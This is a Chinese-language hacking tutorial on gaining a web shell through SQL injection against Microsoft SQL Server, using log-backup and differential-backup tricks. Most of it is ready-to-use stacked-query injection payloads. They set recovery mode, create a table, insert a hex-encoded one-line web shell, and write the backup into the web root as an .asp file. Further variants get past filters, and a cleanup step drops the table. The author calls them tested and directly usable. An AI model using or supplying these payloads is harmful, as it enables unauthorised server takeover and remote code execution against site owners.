log备份这是一种导出日志文件到web路径来getshell的方法
本次简述一下通过sqlserver进行getshell的两种方法,payload可以直接拿来用,话不多说,直接往下看就完事了
优势:
1、重复性好,多次备份的成功率高
2、相对于差异备份而言,shell的体积较小
利用条件:至少DBO权限
1、前提得知绝对路径,并且可写
2、站库不分离
3、数据库必须被备份过一次
第一步:
;alter database 库名 set RECOVERY FULL--
第二步:
;create table 数据库名..表名(a image)-- //建表
第三步:
;insert into 数据库名..表名(a) values (0x一句话木马)-- //插入一句话木马到表中,注意16进制
第四步:
;backup database 数据库名 to disk = 'c:wwwpanda.bak'-- //先手动给test1备份一遍
第五步:
;backup log 数据库名 to disk = 'c:wwwpanda.asp' with init-- //利用log备份到web路径getshell
第六步:
;Drop table 数据库名..表名-- //删除表
差异备份的条件:至少DBO权限
1、前提知道绝对路径,路径可写。
2、HTTP 500错误不是自定义
3、WEB和数据在一块。还有的就是数据库中不能存在%号之类的,不然也是不成功的。
4、数据量不能太大
第一步:
;backup database 库名 to disk = 'c:ak.bak' ;-- //先手动备份一次
如果被过滤,用下方的payload:
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x备份路径xx.bak backup database @a to disk=@s-- //0x备份的数据库名转换成16位进制,db_name()里面可以加数字备份不同的数据库
第二步:
;create table 数据库名..表名(a image)-- //建立表,加字段
第三步:
;insert into 数据库名..表名(a) values (0x一句话木马)-- //插入一句话木马到表中,注意16进制
第四步:
;backup database 库名 to disk = 'c:shell.asp' with differential , format ;-- //进行差异备份
如果被过滤,用下方的payload:
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x备份路径xx.asp backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT-- //备份到路径xx.asp,前提是已得知路径,注意转换为16进制,假如备份的路径为c:webrootpanda.asp ,访问查看是否备份getshell成功
第五步:
;Drop table 数据库..表名-- //备份完getshell过后删除表
文中的方法和payload亲测可用的,至于图片,可以稍微的自行脑补,在注入点上操作即可